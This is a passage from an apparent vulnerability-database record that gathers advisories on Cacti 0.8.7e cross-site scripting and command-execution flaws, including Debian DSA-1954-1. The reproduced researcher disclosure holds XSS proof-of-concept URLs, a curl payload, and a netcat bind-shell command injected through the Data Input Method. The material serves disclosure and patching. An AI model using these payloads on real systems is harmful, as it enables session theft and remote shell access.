issue 5 has not been tracked so far (to my \nknowledge). 
\n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.10 (GNU/Linux) \n \niEYEAREKAAYFAksOFWYACgkQn6GkvSd/Bgwb0QCfZu7dWpBE7FSeds0jeFa1NmzN \nq44An3dl2cZgU/LRpZSjYpuqbo2Ukzbe \n=yeNz \n-----END PGP SIGNATURE----- \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83264/cacti087e-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "unix", "description": "\nThe cacti development team reports:\n\nThe Cross-Site Scripting patch has been posted.\nThis patch addresses cross-site scripting issues reported\n\t by Moritz Naumann.\n\n", "modified": "2010-05-02T00:00:00", "published": "2009-11-21T00:00:00", "id": "04104985-D846-11DE-84E4-00215AF774F0", "href": "https://vuxml.freebsd.org/freebsd/04104985-d846-11de-84e4-00215af774f0.html", "title": "cacti -- cross-site scripting issues", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-03T19:03:22", "bulletinFamily": "exploit", "description": "Cacti 0.8.x graph.php Multiple Parameter XSS. CVE-2009-4032 . Webapps exploit for php platform", "modified": "2009-11-21T00:00:00", "published": "2009-11-21T00:00:00", "id": "EDB-ID:33374", "href": "https://www.exploit-db.com/exploits/33374/", "type": "exploitdb", "title": "Cacti 0.8.x graph.php Multiple Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/37109/info\r\n\r\nCacti is prone to multiple cross-site-scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.\r\n\r\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. 
Other attacks are also possible.\r\n\r\nVersions prior to Cacti 0.8.7g are vulnerable. \r\n\r\n\r\nhttp://www.example.com/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27\r\nhttp://www.example.com/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E\r\nhttp://www.example.com/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33374/"}, {"lastseen": "2016-02-01T12:05:36", "bulletinFamily": "exploit", "description": "Cacti 0.8.7e: Multiple Security Issues. CVE-2009-4032,CVE-2010-2543. Webapps exploit for php platform", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "id": "EDB-ID:10234", "href": "https://www.exploit-db.com/exploits/10234/", "type": "exploitdb", "title": "Cacti 0.8.7e: Multiple Security Issues", "sourceData": "Moritz Naumann <security@moritz-naumann.com>\r\n\r\ncacti:\r\nhttp://www.cacti.net/\r\n\r\n=================================================================\r\nCacti 0.8.7e and earlier versions are affected by multiple security\r\nissues. Issues 1-4 are cross site scripting issues, issue 5 is a\r\npriviledge escalation issue.\r\n\r\n\r\n\r\n\r\n1. XSS 1\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '1' to be displayed:\r\n\r\nhttp://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. 
This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThis vulnerability was tested with Firefox 3.0.6.\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n2. XSS 2\r\n\r\nThe following curl invocation will generate a HTTP POST request\r\nagainst\r\n\r\nhttp://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true\r\n\r\nwith an 'application/x-www-form-urlencoded' content type HTTP body part\r\ncontaining\r\n date1=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cx+y%3D%27'\r\nCurl will write the resulting output to a file named poc.html.\r\n\r\n> curl -d 'date1=%27%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E%3Cx+y%3D%27' 'http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true' > poc.html\r\n\r\nWhen this file is loaded and rendered by a web browser with Javascript\r\nsupport, this will cause a dialog box saying '2' to be displayed.\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n3. 
XSS 3\r\n\r\nIf an attacker or the victim has permission to modify the graph\r\ndisplay settings via graph_settings.php, the attacker is able to\r\npersistently inject javascript code via the 'page_refresh' and\r\n'default_dual_pane_width' parameters.\r\n\r\nSetting 'page_refresh' to the following value will, on any consecutive\r\nvisitors' web browser with Javascript support, cause a dialog box saying\r\n'3' to be displayed:\r\n 300'><x y='\r\n\r\nSetting 'default_dual_pane_width' to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '3' to be displayed:\r\n 200\"><x y=\"\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n4. XSS 4\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '4' to be displayed:\r\n\r\n> >\r\nhttp://CACTIHOST/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nAlternatively, a similar injection can be achieved, if an attacker or\r\nhis victim has permission to modify the graph display settings via\r\ngraph_settings.php. 
If so, the attacker is able to persistently inject\r\njavascript code via the 'title_size', 'legend_size', 'axis_size' and\r\n'unit_size' parameters.\r\n\r\nSetting any of these parameters to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '4' to be displayed:\r\n 8</pre><pre>\r\n\r\nThis vulnerability was tested with Firefox 3.0.6\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n5. Privilege escalation\r\n\r\nFinally, due to the permissive way the web interface allows Cacti\r\nto be configured, a cacti administrator is also able to execute\r\narbitrary commands on the system as the user the Cacti polling mechanism\r\n runs as (usually a non-privileged user).\r\n\r\nFor example, it is possible to successfully spawn (and connect to) a\r\nbackdoor/remote shell on the Cacti system by changing the \"Data Input\r\nMethod\" for \"Linux - Get Memory Usage\". Setting \"Input String\" to\r\n nohup nc -l -p 6666 -n -e /bin/sh &\r\nwould spawn a remotely accessible shell whenever this handler was called\r\n(every couple of minutes by default on my Debian test system).\r\n\r\nCacti developers say:\r\n> There is no effective way to fix the data input method without breaking Cacti. 
It will be reviewed for the release of 0.8.8.\r\n\r\n\r\n\r\nThe XSS issues are currently tracked as CVE-2009-4032 (additional CVEs\r\nmay or may not be assigned), issue 5 has not been tracked so far (to my\r\nknowledge).\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/10234/"}], "seebug": [{"lastseen": "2017-11-19T18:28:20", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18336", "id": "SSV:18336", "type": "seebug", "title": "Cacti 0.8.7e: Multiple Security Issues", "sourceData": "\n Moritz Naumann <security@moritz-naumann.com>\r\n\r\ncacti:\r\nhttp://www.cacti.net/\r\n\r\n=================================================================\r\nCacti 0.8.7e and earlier versions are affected by multiple security\r\nissues. Issues 1-4 are cross site scripting issues, issue 5 is a\r\nprivilege escalation issue.\r\n\r\n\r\n\r\n\r\n1. XSS 1\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '1' to be displayed:\r\n\r\nhttp://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThis vulnerability was tested with Firefox 3.0.6.\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n2. 
XSS 2\r\n\r\nThe following curl invocation will generate a HTTP POST request\r\nagainst\r\n\r\nhttp://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true\r\n\r\nwith an 'application/x-www-form-urlencoded' content type HTTP body part\r\ncontaining\r\n date1=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cx+y%3D%27'\r\nCurl will write the resulting output to a file named poc.html.\r\n\r\n> curl -d 'date1=%27%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E%3Cx+y%3D%27' 'http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true' > poc.html\r\n\r\nWhen this file is loaded and rendered by a web browser with Javascript\r\nsupport, this will cause a dialog box saying '2' to be displayed.\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n3. 
XSS 3\r\n\r\nIf an attacker or the victim has permission to modify the graph\r\ndisplay settings via graph_settings.php, the attacker is able to\r\npersistently inject javascript code via the 'page_refresh' and\r\n'default_dual_pane_width' parameters.\r\n\r\nSetting 'page_refresh' to the following value will, on any consecutive\r\nvisitors' web browser with Javascript support, cause a dialog box saying\r\n'3' to be displayed:\r\n 300'><x y='\r\n\r\nSetting 'default_dual_pane_width' to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '3' to be displayed:\r\n 200"><x y="\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n4. XSS 4\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '4' to be displayed:\r\n\r\n> >\r\nhttp://CACTIHOST/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nAlternatively, a similar injection can be achieved, if an attacker or\r\nhis victim has permission to modify the graph display settings via\r\ngraph_settings.php. 
If so, the attacker is able to persistently inject\r\njavascript code via the 'title_size', 'legend_size', 'axis_size' and\r\n'unit_size' parameters.\r\n\r\nSetting any of these parameters to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '4' to be displayed:\r\n 8</pre><pre>\r\n\r\nThis vulnerability was tested with Firefox 3.0.6\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n5. Privilege escalation\r\n\r\nFinally, due to the permissive way the web interface allows Cacti\r\nto be configured, a cacti administrator is also able to execute\r\narbitrary commands on the system as the user the Cacti polling mechanism\r\n runs as (usually a non-privileged user).\r\n\r\nFor example, it is possible to successfully spawn (and connect to) a\r\nbackdoor/remote shell on the Cacti system by changing the "Data Input\r\nMethod" for "Linux - Get Memory Usage". Setting "Input String" to\r\n nohup nc -l -p 6666 -n -e /bin/sh &\r\nwould spawn a remotely accessible shell whenever this handler was called\r\n(every couple of minutes by default on my Debian test system).\r\n\r\nCacti developers say:\r\n> There is no effective way to fix the data input method without breaking Cacti. 
It will be reviewed for the release of 0.8.8.\r\n\r\n\r\n\r\nThe XSS issues are currently tracked as CVE-2009-4032 (additional CVEs\r\nmay or may not be assigned), issue 5 has not been tracked so far (to my\r\nknowledge).\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18336", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T18:24:06", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-12-17T00:00:00", "published": "2009-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15105", "id": "SSV:15105", "type": "seebug", "title": "New cacti packages fix insufficient input sanitising", "sourceData": "\n - ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1954-1 security@debian.org\r\nhttp://www.debian.org/security/ Steffen Joeris\r\nDecember 16, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : cacti \r\nVulnerability : insufficient input sanitising \r\nProblem type : remote \r\nDebian-specific: no \r\nCVE Ids : CVE-2007-3112 CVE-2007-3113 CVE-2009-4032 \r\nDebian Bugs : 429224 \r\n\r\nSeveral vulnerabilities have been found in cacti, a frontend to rrdtool\r\nfor monitoring systems and services. 
The Common Vulnerabilities and\r\nExposures project identifies the following problems:\r\n\r\nCVE-2007-3112, CVE-2007-3113\r\n\r\nIt was discovered that cacti is prone to a denial of service via the\r\ngraph_height, graph_width, graph_start and graph_end parameters.\r\nThis issue only affects the oldstable (etch) version of cacti.\r\n\r\nCVE-2009-4032\r\n\r\nIt was discovered that cacti is prone to several cross-site scripting\r\nattacks via different vectors.\r\n\r\nCVE-2009-4112\r\n\r\nIt has been discovered that cacti allows authenticated administrator\r\nusers to gain access to the host system by executing arbitrary commands\r\nvia the "Data Input Method" for the "Linux - Get Memory Usage" setting.\r\n\r\nThere is no fix for this issue at this stage. Upstream will implement a\r\nwhitelist policy to only allow certain "safe" commands. For the moment,\r\nwe recommend that such access is only given to trusted users and that\r\nthe options "Data Input" and "User Administration" are otherwise\r\ndeactivated.\r\n\r\n\r\nFor the oldstable distribution (etch), these problems have been fixed in\r\nversion 0.8.6i-3.6.\r\n\r\nFor the stable distribution (lenny), this problem has been fixed in\r\nversion 0.8.7b-2.1+lenny1.\r\n\r\nFor the testing distribution (squeeze), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 0.8.7e-1.1.\r\n\r\n\r\nWe recommend that you upgrade your cacti packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 
alias etch\r\n- -------------------------------\r\n\r\nDebian (oldstable)\r\n- ------------------\r\n\r\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, \\\r\nmipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i.orig.tar.gz\r\n Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.diff.gz\r\n Size/MD5 checksum: 38419 4ee9e373817ebc32297e1c3de8fee10d\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.dsc\r\n Size/MD5 checksum: 590 bb8fb25c6db1cd6a2a785f879943d969\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6_all.deb\r\n Size/MD5 checksum: 962816 9093e9f9abaa6c3dbbedad24cc1d4f7e\r\n\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nDebian (stable)\r\n- ---------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, \\\r\nmipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz\r\n Size/MD5 checksum: 1972444 aa8a740a6ab88e3634b546c3e1bc502f\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.diff.gz \\\r\n Size/MD5 checksum: 37232 04459452593e23c5e837920cfd0f1789\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.dsc\r\n Size/MD5 checksum: 1117 d67349656ce9514266e7d5d2f378a219\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1_all.deb \\\r\n Size/MD5 checksum: 1847182 3876f128fdcc2aefa63d65531875d2ab\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor 
apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAksoyH0ACgkQ62zWxYk/rQfXGwCeKMeQqicZ/LayzFqXznC2W0is\r\nEG8AoLUxcdouXG/aTvqnfKJyWZtpA9TM\r\n=CLbl\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15105", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "jvn": [{"lastseen": "2019-05-29T17:21:37", "bulletinFamily": "info", "description": "\n ## Description\n\nCacti is a web application that graphs stored data collected from network devices. Cacti contains a cross-site scripting vulnerability (CWE-79) due to a flaw in processing parameters in graph_view.php.\n\n ## Impact\n\nIf a user views a malicious page while logged in, an arbitrary script may be executed on the user's web browser.\n\n ## Solution\n\n**Update the software** \nUpdate to the latest version according to the information provided by the developer. 
\n \nAccording to the developer, this issue was addressed in 0.8.7f released in 2010.\n\n ## Products Affected\n\n * Cacti 0.8.7e and earlier\n", "modified": "2015-07-09T00:00:00", "published": "2015-07-09T00:00:00", "id": "JVN:09758120", "href": "http://jvn.jp/en/jp/JVN09758120/index.html", "title": "JVN#09758120: Cacti vulnerable to cross-site scripting", "type": "jvn", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2019-05-30T02:22:25", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1954-1 security@debian.org\nhttp://www.debian.org/security/ Steffen Joeris\nDecember 16, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : cacti \nVulnerability : insufficient input sanitising \nProblem type : remote \nDebian-specific: no \nCVE Ids : CVE-2007-3112 CVE-2007-3113 CVE-2009-4032 \nDebian Bugs : 429224 \n\nSeveral vulnerabilities have been found in cacti, a frontend to rrdtool\nfor monitoring systems and services. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2007-3112, CVE-2007-3113\n\nIt was discovered that cacti is prone to a denial of service via the\ngraph_height, graph_width, graph_start and graph_end parameters.\nThis issue only affects the oldstable (etch) version of cacti.\n\nCVE-2009-4032\n\nIt was discovered that cacti is prone to several cross-site scripting\nattacks via different vectors.\n\nCVE-2009-4112\n\nIt has been discovered that cacti allows authenticated administrator\nusers to gain access to the host system by executing arbitrary commands\nvia the "Data Input Method" for the "Linux - Get Memory Usage" setting.\n\nThere is no fix for this issue at this stage. Upstream will implement a\nwhitelist policy to only allow certain "safe" commands. 
For the moment,\nwe recommend that such access is only given to trusted users and that\nthe options "Data Input" and "User Administration" are otherwise\ndeactivated.\n\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 0.8.6i-3.6.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.8.7b-2.1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.8.7e-1.1.\n\n\nWe recommend that you upgrade your cacti packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i.orig.tar.gz\n Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.diff.gz\n Size/MD5 checksum: 38419 4ee9e373817ebc32297e1c3de8fee10d\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.dsc\n Size/MD5 checksum: 590 bb8fb25c6db1cd6a2a785f879943d969\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6_all.deb\n Size/MD5 checksum: 962816 9093e9f9abaa6c3dbbedad24cc1d4f7e\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- 
---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz\n Size/MD5 checksum: 1972444 aa8a740a6ab88e3634b546c3e1bc502f\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.diff.gz\n Size/MD5 checksum: 37232 04459452593e23c5e837920cfd0f1789\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.dsc\n Size/MD5 checksum: 1117 d67349656ce9514266e7d5d2f378a219\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1_all.deb\n Size/MD5 checksum: 1847182 3876f128fdcc2aefa63d65531875d2ab\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-12-16T11:47:55", "published": "2009-12-16T11:47:55", "id": "DEBIAN:DSA-1954-1:7A11F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00278.html", "title": "[SECURITY] [DSA 1954-1] New cacti packages fix insufficient input sanitising", "type": "debian", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}